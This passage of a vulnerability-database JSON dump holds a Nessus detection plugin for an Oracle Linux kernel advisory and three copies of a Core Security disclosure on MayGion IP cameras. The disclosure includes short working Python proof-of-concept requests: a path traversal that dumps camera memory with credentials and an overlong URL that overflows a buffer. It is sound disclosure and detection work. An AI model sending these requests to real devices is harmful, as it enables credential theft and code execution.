leading to a possible local denial of\nservice when read or write operations were performed on a specially\ncrafted file system. (CVE-2008-3528, Low)\n\n* a deficiency was found in the libATA implementation. This could,\npotentially, lead to a local denial of service. Note: by default, the\n'/dev/sg*' devices are accessible only to the root user.\n(CVE-2008-5700, Low)\n\nBug fixes :\n\n* a bug in aic94xx may have caused kernel panics during boot on some\nsystems with certain SATA disks. (BZ#485909)\n\n* a word endianness problem in the qla2xx driver on PowerPC-based\nmachines may have corrupted flash-based devices. (BZ#485908)\n\n* a memory leak in pipe() may have caused a system deadlock. The\nworkaround in Section 1.5, Known Issues, of the Red Hat Enterprise\nLinux 5.3 Release Notes Updates, which involved manually allocating\nextra file descriptors to processes calling do_pipe, is no longer\nnecessary. (BZ#481576)\n\n* CPU soft-lockups in the network rate estimator. (BZ#481746)\n\n* bugs in the ixgbe driver caused it to function unreliably on some\nsystems with 16 or more CPU cores. (BZ#483210)\n\n* the iwl4965 driver may have caused a kernel panic. (BZ#483206)\n\n* a bug caused NFS attributes to not update for some long-lived NFS\nmounted file systems. (BZ#483201)\n\n* unmounting a GFS2 file system may have caused a panic. (BZ#485910)\n\n* a bug in ptrace() may have caused a panic when single stepping a\ntarget. (BZ#487394)\n\n* on some 64-bit systems, notsc was incorrectly set at boot, causing\nslow gettimeofday() calls. (BZ#488239)\n\n* do_machine_check() cleared all Machine Check Exception (MCE) status\nregisters, preventing the BIOS from using them to determine the cause\nof certain panics and errors. (BZ#490433)\n\n* scaling problems caused performance problems for LAPI applications.\n(BZ#489457)\n\n* a panic may have occurred on systems using certain Intel WiFi Link\n5000 products when booting with the RF Kill switch on. (BZ#489846)\n\n* the TSC is invariant with C/P/T states, and always runs at constant\nfrequency from now on. (BZ#489310)\n\nAll users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.", "edition": 27, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : kernel (ELSA-2009-0326)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5700", "CVE-2008-3528", "CVE-2009-0675", "CVE-2009-0028", "CVE-2009-0778", "CVE-2009-0322", "CVE-2009-0676", "CVE-2009-0269"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-PAE", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-xen-devel", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-PAE-devel", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-xen"], "id": "ORACLELINUX_ELSA-2009-0326.NASL", "href": "https://www.tenable.com/plugins/nessus/67812", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:0326 and \n# Oracle Linux Security Advisory ELSA-2009-0326 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67812);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3528\", \"CVE-2008-5700\", \"CVE-2009-0028\", \"CVE-2009-0269\", \"CVE-2009-0322\", \"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-0778\");\n script_bugtraq_id(33846);\n script_xref(name:\"RHSA\", value:\"2009:0326\");\n\n script_name(english:\"Oracle Linux 5 : kernel (ELSA-2009-0326)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:0326 :\n\nUpdated kernel packages that fix several security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes :\n\n* memory leaks were found on some error paths in the icmp_send()\nfunction in the Linux kernel. This could, potentially, cause the\nnetwork connectivity to cease. (CVE-2009-0778, Important)\n\n* Chris Evans reported a deficiency in the clone() system call when\ncalled with the CLONE_PARENT flag. This flaw permits the caller (the\nparent process) to indicate an arbitrary signal it wants to receive\nwhen its child process exits. This could lead to a denial of service\nof the parent process. (CVE-2009-0028, Moderate)\n\n* an off-by-one underflow flaw was found in the eCryptfs subsystem.\nThis could potentially cause a local denial of service when the\nreadlink() function returned an error. (CVE-2009-0269, Moderate)\n\n* a deficiency was found in the Remote BIOS Update (RBU) driver for\nDell systems. This could allow a local, unprivileged user to cause a\ndenial of service by reading zero bytes from the image_type or\npacket_size files in '/sys/devices/platform/dell_rbu/'.\n(CVE-2009-0322, Moderate)\n\n* an inverted logic flaw was found in the SysKonnect FDDI PCI adapter\ndriver, allowing driver statistics to be reset only when the\nCAP_NET_ADMIN capability was absent (local, unprivileged users could\nreset driver statistics). (CVE-2009-0675, Moderate)\n\n* the sock_getsockopt() function in the Linux kernel did not properly\ninitialize a data structure that can be directly returned to\nuser-space when the getsockopt() function is called with SO_BSDCOMPAT\noptname set. This flaw could possibly lead to memory disclosure.\n(CVE-2009-0676, Moderate)\n\n* the ext2 and ext3 file system code failed to properly handle\ncorrupted data structures, leading to a possible local denial of\nservice when read or write operations were performed on a specially\ncrafted file system. (CVE-2008-3528, Low)\n\n* a deficiency was found in the libATA implementation. This could,\npotentially, lead to a local denial of service. Note: by default, the\n'/dev/sg*' devices are accessible only to the root user.\n(CVE-2008-5700, Low)\n\nBug fixes :\n\n* a bug in aic94xx may have caused kernel panics during boot on some\nsystems with certain SATA disks. (BZ#485909)\n\n* a word endianness problem in the qla2xx driver on PowerPC-based\nmachines may have corrupted flash-based devices. (BZ#485908)\n\n* a memory leak in pipe() may have caused a system deadlock. The\nworkaround in Section 1.5, Known Issues, of the Red Hat Enterprise\nLinux 5.3 Release Notes Updates, which involved manually allocating\nextra file descriptors to processes calling do_pipe, is no longer\nnecessary. (BZ#481576)\n\n* CPU soft-lockups in the network rate estimator. (BZ#481746)\n\n* bugs in the ixgbe driver caused it to function unreliably on some\nsystems with 16 or more CPU cores. (BZ#483210)\n\n* the iwl4965 driver may have caused a kernel panic. (BZ#483206)\n\n* a bug caused NFS attributes to not update for some long-lived NFS\nmounted file systems. (BZ#483201)\n\n* unmounting a GFS2 file system may have caused a panic. (BZ#485910)\n\n* a bug in ptrace() may have caused a panic when single stepping a\ntarget. (BZ#487394)\n\n* on some 64-bit systems, notsc was incorrectly set at boot, causing\nslow gettimeofday() calls. (BZ#488239)\n\n* do_machine_check() cleared all Machine Check Exception (MCE) status\nregisters, preventing the BIOS from using them to determine the cause\nof certain panics and errors. (BZ#490433)\n\n* scaling problems caused performance problems for LAPI applications.\n(BZ#489457)\n\n* a panic may have occurred on systems using certain Intel WiFi Link\n5000 products when booting with the RF Kill switch on. (BZ#489846)\n\n* the TSC is invariant with C/P/T states, and always runs at constant\nfrequency from now on. (BZ#489310)\n\nAll users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-April/000944.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2008-3528\", \"CVE-2008-5700\", \"CVE-2009-0028\", \"CVE-2009-0269\", \"CVE-2009-0322\", \"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-0778\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2009-0326\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-devel-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-devel-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-devel-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-doc-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-headers-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-devel-2.6.18-128.1.6.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-1605", "CVE-2013-1604"], "description": "\r\n\r\nCore Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nMayGion IP Cameras multiple vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n\r\n3. *Vulnerability Description*\r\n\r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n\r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\n . H.264 ipcam firmware 2013.04.22.\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *User Credentials Leaked via Path Traversal*\r\n\r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection("192.168.100.1")\r\nconn.request("GET", "/../../../../../../../../../proc/kcore")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n7.2. *Buffer overflow*\r\n\r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection("192.168.100.1")\r\nconn.request("GET", "/" + "A" * 3000 + ".html")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n8. *Report Timeline*\r\n\r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n\r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n\r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n\r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n\r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n\r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n\r\n9. *References*\r\n\r\n[1] http://www.maygion.com\r\n\r\n10. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n11. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n13. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n\r\n", "edition": 1, "modified": "2013-06-05T00:00:00", "published": "2013-06-05T00:00:00", "id": "SECURITYVULNS:DOC:29457", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29457", "title": "CORE-2013-0322 - MayGion IP Cameras multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T02:13:52", "description": "MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities. CVE-2013-1604,CVE-2013-1605. Webapps exploit for hardware platform", "published": "2013-05-29T00:00:00", "type": "exploitdb", "title": "MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1605", "CVE-2013-1604"], "modified": "2013-05-29T00:00:00", "id": "EDB-ID:25813", "href": "https://www.exploit-db.com/exploits/25813/", "sourceData": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nMayGion IP Cameras multiple vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n\r\n3. *Vulnerability Description*\r\n\r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n\r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\n . H.264 ipcam firmware 2013.04.22.\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *User Credentials Leaked via Path Traversal*\r\n\r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n7.2. *Buffer overflow*\r\n\r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n8. *Report Timeline*\r\n\r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n\r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n\r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n\r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n\r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n\r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n\r\n9. *References*\r\n\r\n[1] http://www.maygion.com\r\n\r\n10. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n11. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n13. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25813/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nMayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities", "edition": 1, "published": "2013-05-29T00:00:00", "title": "MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1605", "CVE-2013-1604"], "modified": "2013-05-29T00:00:00", "id": "EXPLOITPACK:8106854FC718881871F19270353E1090", "href": "", "sourceData": "Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nMayGion IP Cameras multiple vulnerabilities\n\n1. *Advisory Information*\n\nTitle: MayGion IP Cameras multiple vulnerabilities\nAdvisory ID: CORE-2013-0322\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\nDate published: 2013-05-28\nDate of last update: 2013-05-28\nVendors contacted: MayGion\nRelease mode: Coordinated release\n\n2. *Vulnerability Information*\n\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\nImpact: Code execution, Security bypass\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1604, CVE-2013-1605\n\n3. *Vulnerability Description*\n\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\non firmware v09.27 and below, that could allow an unauthenticated remote\nattacker:\n\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\ncredentials,\n 2. [CVE-2013-1605] to execute arbitrary code.\n\n4. *Vulnerable Packages*\n\n . MayGion IP cameras based on firmware 2011.27.09.\n . Other firmware versions are probably affected too but they were not\nchecked.\n\n5. *Non-Vulnerable Packages*\n\n . H.264 ipcam firmware 2013.04.22.\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Nahuel Riva and\nFrancisco Falcon from Core Exploit Writers Team.\n\n7. *Technical Description / Proof of Concept Code*\n\n7.1. *User Credentials Leaked via Path Traversal*\n\n[CVE-2013-1604] The following Python code exploits a path traversal and\ndumps the camera's memory. Valid user credentials can be extracted from\nthis memory dump by an unauthenticated remote attacker.\n\n/-----\nimport httplib\n\nconn = httplib.HTTPConnection(\"192.168.100.1\")\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\nresp = conn.getresponse()\ndata = resp.read()\nconn.close()\n-----/\n\n7.2. *Buffer overflow*\n\n[CVE-2013-1605] The following Python script can be used to trigger the\nvulnerability without authentication. As a result, the Instruction\nPointer register (IP) will be overwritten with 0x61616161, which is a\ntypical buffer overrun condition.\n\n/-----\nimport httplib\n\nconn = httplib.HTTPConnection(\"192.168.100.1\")\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\nresp = conn.getresponse()\ndata = resp.read()\nconn.close()\n-----/\n\n8. *Report Timeline*\n\n. 2013-05-02:\nCore Security Technologies notifies MayGion of the vulnerabilities.\nPublication date is set for May 29th, 2013.\n\n. 2013-05-02:\nVendor asks for a report with technical information.\n\n. 2013-05-03:\nA draft advisory containing technical details sent to MayGion team.\n\n. 2013-05-03:\nVendor notifies that all vulnerabilities were fixed in the last firmware\nversion, released April 22nd, 2013.\n\n. 2013-05-09:\nCore asks for a list of affected devices and firmware. No reply received.\n\n. 2013-05-28:\nAdvisory CORE-2013-0322 is published.\n\n9. *References*\n\n[1] http://www.maygion.com\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com.\n\n11. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations.\n\nCore Security's software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company's Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web 